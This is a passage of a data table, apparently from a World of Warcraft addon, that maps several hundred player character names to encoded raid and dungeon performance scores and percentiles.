["Doinkin"] = "ST:763/99%LB:776/97%EM:901/92%",
["Accazia"] = "ST:750/99%LB:731/98%EM:921/94%",
["Llamabomb"] = "LT:481/96%SB:811/99%LM:990/98%",
["Austeezy"] = "LT:788/98%LB:795/98%LM:953/97%",
["Dizee"] = "ST:766/99%LB:779/97%LM:969/97%",
["Dubspace"] = "LT:772/98%SB:831/99%SM:1060/99%",
["Carltonshank"] = "LT:761/96%SB:799/99%LM:979/98%",
["Evocation"] = "LT:748/95%SB:842/99%SM:1081/99%",
["Xtaz"] = "LT:773/97%LB:781/97%LM:968/97%",
["Ezzy"] = "ST:795/99%SB:816/99%SM:1029/99%",
["Zomberry"] = "LT:850/97%SB:711/99%UM:117/41%",
["Fishermanwil"] = "LT:840/97%LB:721/95%LM:965/98%",
["Thordendal"] = "LT:514/96%LB:709/95%EM:884/94%",
["Soldeia"] = "LT:596/98%LB:706/95%EM:870/94%",
["Drlinlin"] = "LT:581/97%LB:617/97%RM:576/67%",
["Cleanseyou"] = "ET:642/80%EB:618/87%RM:560/66%",
["Byd"] = "ET:398/91%LB:761/98%LM:947/97%",
["Swapsawce"] = "ST:752/99%LB:670/98%LM:860/98%",
["Luminarch"] = "ET:356/87%EB:667/90%EM:904/94%",
["Happytoasts"] = "LT:490/95%EB:610/86%EM:895/94%",
["Tfish"] = "ET:633/79%LB:744/97%LM:970/98%",
["Apoullo"] = "ET:701/87%LB:738/97%LM:943/97%",
["Luhv"] = "ET:744/90%EB:690/94%LM:899/96%",
["Starshärts"] = "RT:406/50%EB:457/87%RM:396/74%",
["Kain"] = "ET:663/85%EB:668/90%LM:939/97%",
["Wangbadan"] = "ET:787/94%EB:652/90%EM:782/88%",
["Claris"] = "ET:674/84%EB:703/94%EM:835/90%",
["Jaipe"] = "ET:673/85%EB:488/90%RM:583/68%",
["Juul"] = "LT:827/96%LB:754/97%SM:996/99%",
["Pathagorus"] = "ET:396/90%EB:538/77%EM:781/88%",
["Hyperbeer"] = "ET:782/93%LB:653/98%LM:921/96%",
["Dontcuss"] = "ET:616/78%EB:568/81%EM:797/87%",
["Mingjian"] = "ET:440/92%EB:692/93%EM:849/91%",
["Hickoree"] = "ET:698/86%EB:698/94%LM:939/97%",
["Bheta"] = "RT:569/73%LB:708/95%EM:865/92%",
["Madline"] = "ET:659/82%RB:294/66%RM:513/60%",
["Dadballs"] = "LT:816/96%EB:681/93%UM:134/37%",
["Goodpi"] = "LT:859/98%LB:570/95%EM:870/94%",
["Umbralol"] = "ET:693/86%LB:724/96%EM:687/76%",
["Vanillafanta"] = "ET:649/82%EB:575/82%EM:752/85%",
["Uperrpro"] = "ET:700/87%EB:669/91%SM:978/99%",
["Schme"] = "ET:373/89%LB:747/97%EM:893/93%",
["Froderik"] = "ET:424/91%LB:625/97%EM:674/93%",
["Shocknlold"] = "ST:936/99%LB:778/98%LM:782/96%",
["Dadoc"] = "ET:690/86%EB:698/94%EM:870/94%",
["Pillcrosby"] = "ET:652/82%RB:459/66%UM:313/37%",
["Obscuretas"] = "ET:754/91%LB:671/98%EM:688/76%",
["Owim"] = "LT:519/96%EB:606/86%EM:778/83%",
["Catiffana"] = "ET:657/84%EB:657/90%EM:716/85%",
["Gnesios"] = "ET:311/80%EB:526/75%EM:799/87%",
["Hankey"] = "ET:763/92%LB:749/96%SM:982/99%",
["Blacko"] = "ET:677/84%EB:653/91%EM:816/88%",
["Hammermedady"] = "ET:782/94%EB:643/89%EM:786/87%",
["Nears"] = "ET:441/92%EB:692/93%EM:793/86%",
["Orbits"] = "ET:740/90%LB:746/96%EM:881/92%",
["Malchazor"] = "ET:731/90%EB:710/94%SM:998/99%",
["Ajoke"] = "ET:750/91%LB:740/97%LM:970/98%",
["Swamiz"] = "ET:724/89%EB:680/93%EM:777/87%",
["Imnothealing"] = "ET:654/82%EB:640/89%EM:882/93%",
["Naahman"] = "RT:195/59%EB:537/77%RM:579/68%",
["Kobac"] = "LT:874/98%SB:873/99%SM:1033/99%",
["Silkybalboa"] = "LT:841/97%SB:800/99%LM:930/96%",
["Lightpale"] = "LT:805/95%LB:718/95%EM:864/93%",
["Armorphous"] = "LT:730/98%LB:731/96%EM:812/92%",
["Cubbyj"] = "LT:821/96%EB:558/94%EM:816/89%",
["Bigbonergirl"] = "ET:771/93%EB:630/88%EM:554/87%",
["Ariesreaper"] = "RT:520/66%EB:600/83%EM:889/94%",
["Duelistgodx"] = "ET:781/94%EB:560/79%SM:966/99%",
["Fibonaccii"] = "ET:765/92%EB:724/94%EM:893/93%",
["Sanctizzle"] = "ET:685/86%EB:637/88%EM:829/87%",
["Bubbelhearth"] = "ET:723/90%EB:682/93%EM:852/92%",
["Floracy"] = "LT:603/97%EB:649/90%EM:746/82%",
["Gameislife"] = "LT:813/95%LB:720/95%EM:902/94%",
["Oojbk"] = "LT:515/95%EB:709/94%EM:793/89%",
["Gooseman"] = "LT:452/95%LB:757/95%EM:817/86%",
["Ahiam"] = "ET:686/89%EB:752/94%EM:893/93%",
["Dbz"] = "LT:768/97%LB:760/96%LM:945/96%",
["Funsìze"] = "ET:679/88%EB:725/92%LM:941/96%",
["Stances"] = "LT:482/96%LB:756/95%EM:925/94%",
["Tiga"] = "LT:427/95%LB:753/95%EM:841/89%",
["Deletiur"] = "ET:700/90%EB:746/94%EM:815/84%",
["Dirkfunk"] = "LT:651/98%LB:793/98%EM:901/92%",
["Daggers"] = "LT:768/97%LB:771/97%LM:978/98%",
["Iamobsessed"] = "ET:622/88%LB:735/95%EM:777/89%",
["Teatstain"] = "LT:767/97%LB:763/96%LM:959/97%",
["Artoo"] = "ST:897/99%SB:952/99%SM:1098/99%",
["Kintron"] = "ET:631/82%EB:741/94%LM:971/97%",
["Spicechicken"] = "ET:732/93%LB:721/98%LM:817/96%",
["Glaim"] = "RT:410/56%EB:743/94%EM:840/87%",
["Napkin"] = "LT:751/95%LB:754/95%LM:938/95%",
["Zeffuh"] = "ET:653/86%LB:665/96%EM:853/90%",
["Gokette"] = "ST:799/99%SB:793/99%LM:973/98%",
["Sneakyswag"] = "LB:763/96%EM:857/88%",
["Cursedyou"] = "ST:812/99%SB:845/99%SM:1057/99%",
["Nemesiz"] = "ET:582/78%LB:633/95%LM:798/96%",
["Sorority"] = "ET:698/89%LB:772/97%SM:996/99%",
["Lolwarrior"] = "RT:164/59%EB:749/94%EM:681/75%",
["Yeshuee"] = "LT:597/98%SB:809/99%LM:947/96%",
["Uncool"] = "LT:463/95%LB:766/96%LM:934/95%",
["Dankalicious"] = "ET:660/85%LB:665/96%EM:903/92%",
["Cambone"] = "ET:649/84%EB:716/91%EM:700/75%",
["Pikaque"] = "LT:561/97%EB:739/93%EM:516/81%",
["Fastestcorn"] = "ET:725/93%LB:766/96%LM:910/98%",
["Rtko"] = "ET:726/93%EB:750/94%EM:844/87%",
["Gorillagllue"] = "ET:731/93%LB:765/96%LM:834/96%",
["Kappu"] = "LT:495/96%EB:740/93%UM:268/27%",
["Whohe"] = "LT:763/96%LB:788/98%LM:943/96%",
["Chalisse"] = "ET:571/75%LB:774/97%EM:909/92%",
["Throe"] = "ET:631/84%LB:755/95%LM:941/96%",
["Raphtalía"] = "UT:227/33%LB:760/95%EM:906/93%",
["Tiggleswurth"] = "ET:673/91%LB:777/98%LM:954/97%",
["Chriss"] = "LT:778/97%LB:782/98%LM:949/96%",
["Squibble"] = "LT:753/95%LB:765/96%EM:944/94%",
["Kraknar"] = "ET:315/88%EB:700/89%EM:793/85%",
["Akkad"] = "LT:781/98%LB:786/98%LM:980/98%",
["Badqueues"] = "LT:561/97%LB:781/98%LM:975/98%",
["Bye"] = "ET:675/87%EB:747/94%EM:929/94%",
["Hcm"] = "LT:763/96%LB:764/96%EM:912/94%",
["Chunkie"] = "EB:734/93%EM:903/92%",
["Bepper"] = "UT:373/49%SB:803/99%SM:1004/99%",
["Artimus"] = "ST:833/99%SB:855/99%SM:991/99%",
["Crakk"] = "RT:185/63%LB:794/98%LM:987/98%",
["Hobbest"] = "ET:741/94%LB:680/96%LM:948/97%",
["Thehardpill"] = "RT:499/68%EB:743/93%EM:891/91%",
["Pomfer"] = "ET:719/92%SB:772/99%EM:869/89%",
["Sevenhead"] = "ET:415/93%EB:599/93%EM:907/92%",
["Sneakyzipy"] = "ET:736/93%LB:793/98%LM:949/96%",
["Phaeded"] = "ET:717/92%EB:729/92%EM:811/85%",
["Trenrage"] = "ET:243/77%EB:728/92%EM:748/94%",
["Zelle"] = "LT:755/95%SB:819/99%SM:1008/99%",
["Enjina"] = "LT:770/98%LB:770/98%LM:952/97%",
["Vegan"] = "LT:766/97%SB:812/99%SM:990/99%",
["Saddest"] = "UT:90/33%LB:778/97%LM:963/97%",
["Onefifty"] = "ET:703/90%LB:791/98%LM:940/96%",
["Gloopey"] = "LB:759/95%EM:907/92%",
["Manitas"] = "ET:728/93%LB:753/95%EM:915/93%",
["Gkp"] = "LT:758/96%LB:761/96%EM:871/90%",
["Tanasi"] = "LT:782/98%LB:784/98%LM:957/97%",
["Gumxmvp"] = "EB:741/93%LM:955/96%",
["Grugnugg"] = "ST:744/99%LB:782/98%SM:1007/99%",
["Dionysus"] = "LT:754/96%LB:776/97%LM:940/96%",
["Yiikvaar"] = "ET:674/84%LB:700/95%EM:809/88%",
["Manavidan"] = "LT:584/97%LB:718/95%EM:814/89%",
["Sophisticate"] = "ET:712/89%LB:771/98%LM:950/98%",
["Celebrimbor"] = "ET:268/77%LB:730/96%EM:662/93%",
["Drimmz"] = "ET:309/80%LB:706/95%LM:944/97%",
["Sunmoon"] = "ET:750/91%LB:752/97%EM:890/93%",
["Kittysniper"] = "LT:510/95%EB:676/91%EM:740/80%",
["Shocktopped"] = "LT:422/95%LB:653/97%EM:848/89%",
["Grettell"] = "LT:659/98%LB:713/95%LM:800/97%",
["Krantics"] = "ET:318/81%LB:727/96%EM:891/94%",
["Fellowships"] = "LT:838/97%SB:785/99%LM:959/98%",
["Shamoolatto"] = "LT:612/97%LB:749/96%LM:935/96%",
["Totemox"] = "ST:724/99%LB:772/98%LM:895/95%",
["Robitussin"] = "CT:52/12%EB:562/78%EM:811/88%",
["Cozyheals"] = "RT:545/69%EB:644/90%RM:636/70%",
["Kayotics"] = "UT:284/35%LB:719/96%SM:1016/99%",
["Erishum"] = "ET:802/94%LB:778/98%EM:763/83%",
["Alayana"] = "ET:688/86%EB:688/93%EM:773/86%",
["Givemespirit"] = "ET:260/75%SB:779/99%EM:584/89%",
["Zeronie"] = "ET:741/91%LB:724/96%EM:782/87%",
["Lynchmaster"] = "UT:382/48%LB:756/98%EM:877/93%",
["Gotcaffeine"] = "UT:271/33%LB:718/96%LM:901/95%",
["Taylorsvvift"] = "ET:412/91%LB:751/97%EM:783/85%",
["Shinkiroo"] = "LT:569/96%EB:710/94%EM:618/90%",
["Anshlamis"] = "LT:653/98%LB:659/98%EM:871/93%",
["Lïfesaver"] = "ET:750/91%LB:702/95%EM:667/77%",
["Scrumzor"] = "ET:352/87%LB:722/96%LM:918/95%",
["Saharieo"] = "ET:757/91%EB:676/92%EM:792/88%",
["Kolde"] = "ET:458/94%LB:745/97%SM:992/99%",
["Vyanra"] = "ET:611/77%EB:690/94%EM:681/93%",
["Vixium"] = "ET:698/87%LB:762/98%LM:921/96%",
["Twiggleberry"] = "ST:883/99%SB:791/99%SM:1006/99%",
["Niyori"] = "ST:710/99%SB:788/99%EM:676/93%",
["Debauchery"] = "ET:262/76%LB:737/96%LM:921/96%",
["Drazhara"] = "ET:386/88%EB:656/90%LM:914/96%",
["Critically"] = "LT:548/96%EB:656/89%LM:756/96%",
["Hisokashm"] = "ET:373/87%LB:597/95%EM:765/84%",
["Pearlmilktea"] = "RT:482/61%EB:677/92%EM:813/89%",
["Forhead"] = "RT:204/65%EB:629/87%LM:932/96%",
["Atlantius"] = "EB:367/77%EM:823/89%",
["Caiya"] = "ET:368/87%EB:669/92%EM:679/93%",
["Sequioa"] = "LT:632/98%LB:717/95%EM:880/92%",
["Baptizta"] = "LT:843/97%LB:738/97%LM:916/97%",
["Br"] = "ET:427/92%LB:750/97%LM:952/98%",
["Friar"] = "LT:615/97%LB:692/98%SM:989/99%",
["Shockles"] = "RT:438/55%EB:698/93%RM:636/70%",
["Bullmike"] = "ET:282/75%EB:642/88%EM:646/91%",
["Sosoon"] = "LT:838/97%SB:778/99%LM:904/96%",
["Jeromebarkly"] = "CT:122/13%RB:452/65%EM:700/94%",
["Hammerstrong"] = "ET:421/92%LB:715/95%EM:872/92%",
["Anowl"] = "RT:490/63%EB:712/94%EM:889/93%",
["Stumpyy"] = "RT:435/55%EB:533/77%EM:702/81%",
["Toxiccow"] = "ET:769/92%EB:695/93%EM:781/84%",
["Healdoken"] = "ET:358/86%EB:651/89%EM:670/93%",
["Cmarty"] = "LT:757/96%LB:767/96%EM:910/94%",
["Brewsy"] = "ET:726/93%SB:805/99%LM:994/98%",
["Gamerwords"] = "LT:776/98%SB:813/99%SM:998/99%",
["Crazynuts"] = "ST:805/99%SB:804/99%LM:988/98%",
["Draino"] = "LT:783/98%SB:758/99%LM:985/98%",
["Glorious"] = "LT:781/98%SB:819/99%SM:1019/99%",
["Adalimumab"] = "LT:763/96%SB:752/99%LM:985/98%",
["Ezclappens"] = "LT:766/97%LB:738/96%LM:960/97%",
["Somang"] = "LT:756/96%SB:924/99%SM:1081/99%",
["Strobey"] = "LT:780/98%LB:775/97%LM:960/97%",
["Animebabe"] = "LT:776/98%SB:839/99%SM:1056/99%",
["Desit"] = "LT:760/96%LB:756/95%EM:871/88%",
["Hypotenuse"] = "ST:796/99%LB:795/98%LM:976/98%",
["Renoa"] = "ST:778/99%SB:839/99%LM:988/98%",
["Xole"] = "ST:804/99%SB:827/99%SM:996/99%",
["Joebo"] = "LT:757/96%SB:777/99%LM:946/97%",
["Windfuryplz"] = "ET:734/94%EB:720/91%LM:922/95%",
["Dashwat"] = "LT:760/96%LB:760/95%LM:947/96%",
["Idennisl"] = "ST:708/99%LB:707/97%LM:949/96%",
["Sincara"] = "LT:782/98%LB:759/95%EM:784/83%",
["Mlxg"] = "ET:738/94%LB:661/96%LM:923/95%",
["Cauztic"] = "ET:722/94%LB:762/97%LM:905/95%",
["Pocc"] = "ET:726/92%EB:568/92%EM:525/82%",
["Drazic"] = "LT:789/98%LB:773/97%EM:862/91%",
["Xiaobizaizi"] = "LT:775/97%LB:768/96%EM:902/92%",
["Strawberri"] = "LT:757/96%SB:815/99%LM:974/98%",
["Zerachode"] = "LT:630/98%EB:682/86%EM:766/80%",
["Badoobie"] = "LT:780/98%LB:790/98%EM:859/94%",
["Cutypie"] = "LT:766/97%LB:751/95%EM:920/94%",
["Satansgift"] = "ST:645/99%LB:756/95%EM:835/86%",
["Killstep"] = "LT:766/96%LB:793/98%EM:931/94%",
["Sas"] = "ST:802/99%SB:869/99%SM:1041/99%",
["Atker"] = "ET:599/85%SB:797/99%EM:863/91%",
["Gushers"] = "LT:776/98%LB:690/98%LM:988/98%",
["Xendban"] = "LT:767/97%LB:679/98%EM:844/89%",
["Arkaanum"] = "LT:750/96%LB:661/98%LM:964/97%",
["Grubhub"] = "LT:782/98%LB:800/98%SM:1006/99%",
["Sjwwarrior"] = "LT:656/98%EB:712/90%EM:911/93%",
["Swanksinatra"] = "ST:794/99%SB:834/99%SM:1031/99%",
["Kittykappou"] = "ET:730/93%EB:717/91%EM:715/78%",
["Ezizh"] = "ST:814/99%SB:852/99%SM:984/99%",
["Freezestyle"] = "LT:750/95%LB:789/98%LM:972/98%",
["Thedawg"] = "ST:798/99%SB:766/99%LM:981/98%",
["Positiverpr"] = "LT:769/97%SB:805/99%EM:866/90%",
["Emity"] = "ST:802/99%LB:785/98%LM:950/97%",
["Rancid"] = "LT:777/97%EB:714/90%LM:979/97%",
["Gumbot"] = "ST:798/99%SB:811/99%SM:1058/99%",
["Skyblue"] = "LT:758/96%LB:734/96%EM:774/83%",
["Beardedgnome"] = "LT:767/97%SB:816/99%SM:1030/99%",
["Superfuture"] = "ST:846/99%SB:794/99%LM:963/98%",
["Innertia"] = "LT:757/96%EB:556/79%EM:363/78%",
["Kubush"] = "LT:761/97%SB:814/99%SM:1004/99%",
["Norbend"] = "LT:757/96%LB:777/97%LM:945/97%",
["Bens"] = "LT:788/98%SB:817/99%SM:1065/99%",
["Fubzy"] = "LT:788/98%LB:799/98%SM:1026/99%",
["Diplol"] = "LT:760/96%EB:752/94%LM:934/95%",
["Rudolf"] = "ST:864/99%SB:838/99%SM:1029/99%",
["Bernoulli"] = "LT:761/97%EB:751/94%LM:960/98%",
["Baddos"] = "ET:677/88%LB:754/95%EM:589/87%",
["Kanni"] = "ST:795/99%LB:752/95%EM:896/93%",
["Nickmurks"] = "LT:791/98%SB:834/99%SM:999/99%",
["Caseycasey"] = "ST:812/99%SB:841/99%SM:1023/99%",
["Glasgow"] = "LT:775/97%EB:688/92%EM:882/92%",
["Ivaldi"] = "ST:802/99%LB:742/96%LM:903/96%",
["Noumu"] = "LT:770/97%SB:826/99%LM:925/96%",
["Drbasketball"] = "LT:774/97%LB:787/98%LM:941/96%",
["Coupon"] = "LT:781/98%SB:797/99%LM:961/97%",
["Summer"] = "LT:775/98%SB:827/99%LM:957/97%",
["Urwet"] = "ST:792/99%SB:806/99%SM:1079/99%",
["Babyslug"] = "LT:780/98%LB:779/97%SM:1008/99%",
["Chili"] = "ST:779/99%EB:650/85%LM:954/96%",
["Pillman"] = "LT:771/98%EB:559/91%EM:742/78%",
["Basecrits"] = "LT:743/95%EB:699/89%EM:818/87%",
["Inukenshyn"] = "LT:780/98%LB:781/98%LM:934/95%",
["Cantrip"] = "LT:636/98%LB:749/95%LM:923/95%",
["Mulligen"] = "LT:453/95%LB:762/97%LM:957/97%",
["Evanyuan"] = "ET:330/83%EB:653/91%EM:709/94%",
["Woweeclap"] = "LT:827/96%EB:694/92%EM:677/75%",
["Asho"] = "ET:783/94%EB:684/92%LM:964/98%",
["Velleria"] = "ET:679/84%EB:696/94%LM:926/96%",
["Cintrine"] = "ET:698/86%LB:712/96%EM:887/94%",
["Wdnmdqs"] = "ET:760/92%EB:699/94%EM:855/92%",
["Roachboy"] = "LT:809/95%LB:706/95%EM:892/94%",
["Babibabi"] = "LT:861/98%LB:750/97%EM:857/92%",
["Daydreamer"] = "LT:880/98%SB:717/99%SM:996/99%",
["Mommy"] = "ET:726/89%LB:713/95%LM:967/98%",
["Simplicityy"] = "ET:736/91%LB:570/95%EM:818/90%",
["Carldamon"] = "ET:440/92%EB:599/83%LM:920/96%",
["Niubility"] = "ET:446/93%LB:723/95%EM:781/85%",
["Killcompany"] = "ET:579/76%EB:657/90%LM:946/97%",
["Kurbie"] = "ET:769/92%EB:670/90%",
["Iucifer"] = "ST:723/99%LB:595/96%LM:758/96%",
["Thinmints"] = "ET:416/93%EB:610/85%EM:706/80%",
["Healingwound"] = "ET:701/87%EB:533/93%EM:635/91%",
["Viiv"] = "ET:746/91%EB:509/91%EM:819/88%",
["Myypriest"] = "ET:682/85%EB:599/85%EM:823/89%",
["Skitlez"] = "ET:425/93%LB:751/97%EM:832/89%",
["Spiffie"] = "LT:876/98%LB:745/97%LM:948/98%",
["Ahhwhaat"] = "RT:534/69%RB:478/66%EM:836/88%",
["Comicpri"] = "ET:668/83%EB:666/91%EM:752/85%",
["Elebrity"] = "LT:835/97%LB:750/97%LM:918/95%",
["Ptitjeremy"] = "ET:612/79%EB:559/94%EM:796/88%",
["Thotdot"] = "ET:594/76%EB:645/89%EM:847/89%",
["Almightyso"] = "RT:476/60%EB:548/76%EM:883/93%",
["Poms"] = "ET:748/91%EB:656/91%LM:893/96%",
["Madtev"] = "LT:813/96%EB:476/88%EM:898/94%",
["Qishi"] = "ET:272/77%RB:415/56%EM:832/89%",
["Nicos"] = "ET:646/82%LB:676/98%EM:817/87%",
["Yrdum"] = "RT:196/62%SB:808/99%LM:955/98%",
["Styer"] = "ET:675/85%EB:662/91%EM:797/88%",
["Jowsus"] = "LT:633/98%LB:731/96%LM:911/95%",
["Mouid"] = "LT:722/95%SB:806/99%LM:932/96%",
["Squeezener"] = "RT:531/67%EB:432/85%EM:696/75%",
["Zimpous"] = "LT:549/96%EB:630/88%EM:769/87%",
["Vitalzz"] = "ET:768/92%EB:656/89%RM:632/70%",
["Alexandras"] = "ET:748/91%LB:742/97%LM:935/96%",
["Kahli"] = "ET:406/90%EB:485/89%EM:814/88%",
["Ulfie"] = "RT:499/63%EB:358/76%EM:779/85%",
["Aimersuki"] = "ET:664/83%EB:424/84%EM:826/89%",
["Hugbigleg"] = "ET:697/86%SB:813/99%LM:934/97%",
["Telgron"] = "ET:609/78%EB:597/82%EM:773/84%",
["Grogon"] = "RT:490/62%EB:566/81%",
["Ritacom"] = "RT:583/74%RB:413/59%RM:501/55%",
["Vages"] = "ET:629/79%EB:687/93%EM:887/94%",
["Destinylol"] = "ST:810/99%SB:681/99%LM:936/97%",
["Freeoh"] = "ET:456/93%EB:656/90%EM:803/87%",
["Zephyron"] = "LT:684/98%LB:618/97%EM:867/94%",
["Canis"] = "RT:520/66%EB:674/92%LM:918/96%",
["Xgrithina"] = "LT:494/95%LB:732/96%EM:850/90%",
["Yowzer"] = "RT:191/58%EB:426/84%EM:737/81%",
["Gluuni"] = "ET:713/89%EB:567/80%EM:717/78%",
["Mykidssocute"] = "ET:596/75%EB:590/82%EM:721/79%",
["Yiri"] = "LT:683/98%EB:625/86%EM:821/89%",
["Spektrum"] = "ET:773/92%EB:509/91%LM:745/95%",
["Kharn"] = "ET:751/90%EB:566/94%EM:745/83%",
["Kiele"] = "ET:651/81%LB:709/95%SM:1001/99%",
["Cosmic"] = "ET:694/86%LB:716/96%LM:830/98%",
["Praxideke"] = "RT:554/70%EB:428/84%RM:490/54%",
["Reflectman"] = "RT:522/67%EB:696/93%LM:916/95%",
["Nostalgia"] = "LT:665/98%LB:636/98%EM:872/93%",
["Innerbeauty"] = "ET:682/85%LB:662/98%LM:954/98%",
["Aluuni"] = "LT:839/97%EB:706/94%EM:896/94%",
["Glandor"] = "ET:740/94%LB:768/96%LM:823/96%",
["Linckes"] = "LT:769/97%LB:782/98%LM:901/98%",
["Kinyai"] = "ET:731/93%LB:765/96%EM:843/87%",
["Vxyn"] = "RT:178/61%SB:800/99%LM:957/96%",
["Starkham"] = "ET:729/93%LB:668/96%LM:842/97%",
["Warcrime"] = "ET:684/91%LB:709/98%EM:647/90%",
["Dan"] = "ST:697/99%LB:686/97%EM:896/91%",
["Wargroove"] = "ET:733/94%EB:740/93%EM:776/83%",
["Remyfury"] = "ET:660/90%EB:721/91%RM:640/71%",
["Blootz"] = "LT:745/96%LB:740/95%EM:880/91%",
["Danbi"] = "ST:826/99%SB:811/99%LM:952/97%",
["Mapp"] = "ET:728/93%LB:770/97%LM:910/95%",
["Fckmylife"] = "ET:633/82%EB:619/94%EM:625/88%",
["Firetruck"] = "ET:731/93%LB:785/98%LM:979/98%",
["Smogmopster"] = "ET:702/90%LB:687/97%EM:847/88%",
["Everyone"] = "ET:687/89%EB:738/93%EM:785/89%",
["Thundersword"] = "ET:678/88%LB:760/96%LM:942/96%",
["Fantisity"] = "ET:264/81%EB:715/90%EM:846/87%",
["Saberwoof"] = "ST:797/99%SB:775/99%EM:905/93%",
["Iterationz"] = "ET:663/86%EB:746/94%EM:898/93%",
["Notcuban"] = "RT:538/73%EB:699/89%EM:833/88%",
["Fleett"] = "ET:697/92%LB:785/98%LM:951/97%",
["Whisperinghu"] = "ET:687/88%LB:698/97%LM:939/95%",
["Durdle"] = "LT:771/97%SB:800/99%LM:889/98%",
["Noask"] = "LT:768/97%LB:757/95%LM:922/95%",
["Shadeyy"] = "ET:722/92%LB:743/98%EM:846/88%",
["Thewolfe"] = "ET:726/93%EB:747/94%EM:829/88%",
["Hobbes"] = "LT:776/97%LB:761/95%LM:994/98%",
["Seymor"] = "ET:334/88%LB:669/96%EM:926/94%",
["Gloodizzle"] = "LT:750/95%EB:733/92%LM:977/98%",
["Molyharry"] = "LT:755/95%LB:792/98%SM:993/99%",
["Fubze"] = "EB:730/92%EM:785/83%",
["Naxtul"] = "ET:596/79%LB:753/95%LM:852/97%",
["Keflex"] = "LT:609/98%LB:753/96%LM:949/97%",
["Wonderbra"] = "LT:750/95%LB:636/95%EM:888/92%",
["Hotgrlbummer"] = "ST:789/99%SB:802/99%SM:985/99%",
["Rihavein"] = "ET:572/77%LB:796/98%LM:944/96%",
["Lolygagz"] = "LT:787/98%SB:827/99%SM:1041/99%",
["Tummisticks"] = "ET:639/84%LB:766/96%LM:947/96%",
["Lanister"] = "ST:796/99%LB:795/98%LM:938/95%",
["Hawth"] = "ET:728/93%LB:764/96%LM:962/97%",
["Oxley"] = "ET:729/93%EB:746/94%LM:929/95%",
["Healmeinc"] = "ET:589/78%LB:755/95%LM:765/95%",
["Monstrous"] = "LT:541/97%EB:740/93%EM:939/94%",
["Texaco"] = "ET:546/80%EB:744/93%EM:818/91%",
["Ptkfs"] = "ET:582/78%LB:751/95%EM:631/89%",
["Winistroni"] = "RT:417/57%LB:789/98%LM:952/96%",
["Kaosblades"] = "LT:748/95%LB:765/96%EM:929/94%",
["Zeshe"] = "ST:798/99%SB:818/99%LM:971/98%",
["Justjoshin"] = "LT:763/96%EB:722/91%EM:873/91%",
["Phobophile"] = "ST:812/99%SB:868/99%SM:983/99%",
["Rashod"] = "LT:588/98%EB:708/93%EM:743/88%",
["Buzzbin"] = "RT:469/61%LB:777/97%LM:979/98%",
["Bigtian"] = "LT:755/96%LB:761/95%EM:828/91%",
["Kloverx"] = "LT:747/95%EB:561/91%EM:812/86%",
["Latusa"] = "RT:547/74%EB:721/91%LM:930/95%",
["Orcwitcher"] = "LT:764/97%EB:739/93%LM:964/98%",
["Babyshrimp"] = "LT:754/95%LB:773/97%EM:929/94%",
["Omfghax"] = "UT:115/45%EB:538/90%EM:477/80%",
["Bufond"] = "ET:253/79%EB:717/91%EM:770/81%",
["Admyn"] = "LT:444/95%EB:729/92%LM:946/97%",
["Iddqd"] = "LT:752/95%LB:647/95%LM:944/95%",
["Chonkie"] = "ET:337/88%EB:728/92%EM:777/81%",
["Bigbitz"] = "UT:102/41%LB:759/95%LM:955/97%",
["Hexblade"] = "ST:791/99%SB:793/99%SM:1028/99%",
["Khandro"] = "ET:705/86%EB:547/93%EM:895/93%",
["Femke"] = "ET:680/85%EB:673/92%LM:903/95%",
["Sunnydoll"] = "RT:172/53%EB:655/90%EM:855/91%",
["Dysania"] = "LT:554/96%LB:580/95%EM:875/93%",
["Coen"] = "RT:261/72%EB:664/92%EM:769/84%",
["Tisi"] = "ET:654/82%EB:671/92%LM:897/96%",
["Mansnothot"] = "RT:569/72%EB:637/89%RM:548/64%",
["Shackheal"] = "ET:502/84%LB:750/97%SM:987/99%",
["Shamaneps"] = "UT:160/49%RB:476/69%EM:903/94%",
["Synshamwow"] = "RB:404/58%RM:590/66%",
["Frooqi"] = "LT:572/97%LB:598/96%SM:884/99%",
["Kirinan"] = "LB:759/98%LM:956/98%",
["Toughtusk"] = "CT:163/18%EB:619/84%EM:799/85%",
["Mellok"] = "ET:412/90%EB:563/94%EM:603/89%",
["Pendrago"] = "ET:458/80%LB:733/95%LM:952/98%",
["Jmana"] = "ET:278/75%EB:689/93%EM:850/89%",
["Castyouout"] = "ET:337/85%LB:708/95%EM:807/87%",
["Rthlssob"] = "RT:187/57%EB:631/87%EM:826/89%",
["Nalani"] = "LB:721/96%LM:921/97%",
["Anarchy"] = "ET:600/76%EB:668/92%EM:850/91%",
["Rottenpizza"] = "ET:733/89%EB:688/93%EM:709/86%",
["Paparazzi"] = "LT:861/98%SB:803/99%SM:992/99%",
["Medik"] = "ET:770/93%LB:717/96%EM:827/89%",
["Lawful"] = "LT:602/98%LB:724/95%LM:966/98%",
["Tildypoo"] = "LT:583/97%EB:500/91%LM:837/98%",
["Bernardii"] = "UT:371/46%EB:657/90%EM:875/93%",
["Btrip"] = "ET:739/89%EB:658/89%EM:879/94%",
["Albuyno"] = "ET:330/84%LB:730/96%LM:869/98%",
["Shinobuchan"] = "RT:192/58%EB:695/94%EM:869/94%",
["Brokenword"] = "UT:334/41%LB:722/96%EM:726/80%",
["Anazil"] = "LT:811/95%LB:724/96%EM:805/89%",
["Anthim"] = "ET:428/92%SB:782/99%LM:947/97%",
["Melarina"] = "RT:205/61%EB:660/90%EM:777/83%",
["Fjori"] = "ET:713/88%LB:722/96%EM:847/90%",
["Dallarius"] = "LT:509/96%LB:764/98%LM:869/98%",
["Icaro"] = "ET:799/94%LB:738/96%LM:906/95%",
["Diewalkure"] = "ET:363/88%EB:645/90%EM:547/87%",
["Nysse"] = "ET:666/82%LB:736/95%EM:871/91%",
["Morningw"] = "ET:662/83%LB:718/95%EM:448/80%",
["Littleying"] = "ET:404/90%LB:729/95%EM:915/94%",
["Drez"] = "ET:625/79%EB:495/90%EM:656/92%",
["Spanky"] = "EB:670/90%EM:785/90%",
["Danskizzle"] = "CT:163/18%EB:611/85%EM:847/89%",
["Dirtbutton"] = "ET:473/94%EB:701/93%LM:943/96%",
["Purgee"] = "LT:876/98%LB:738/96%LM:951/97%",
["Lilkimchi"] = "ET:339/83%EB:565/94%EM:872/91%",
["Makita"] = "LT:624/98%LB:629/97%LM:731/95%",
["Jimmypop"] = "LT:583/97%LB:729/95%EM:912/94%",
["Lucerna"] = "LT:857/98%LB:719/95%LM:961/98%",
["Hopeless"] = "ET:761/92%EB:679/93%EM:855/93%",
["Pekumen"] = "ET:729/89%LB:723/95%EM:877/92%",
["Silence"] = "ET:749/91%LB:718/95%EM:908/94%",
["Evi"] = "LT:807/95%EB:703/94%SM:902/99%",
["Buyakasha"] = "ET:601/76%LB:560/95%EM:608/90%",
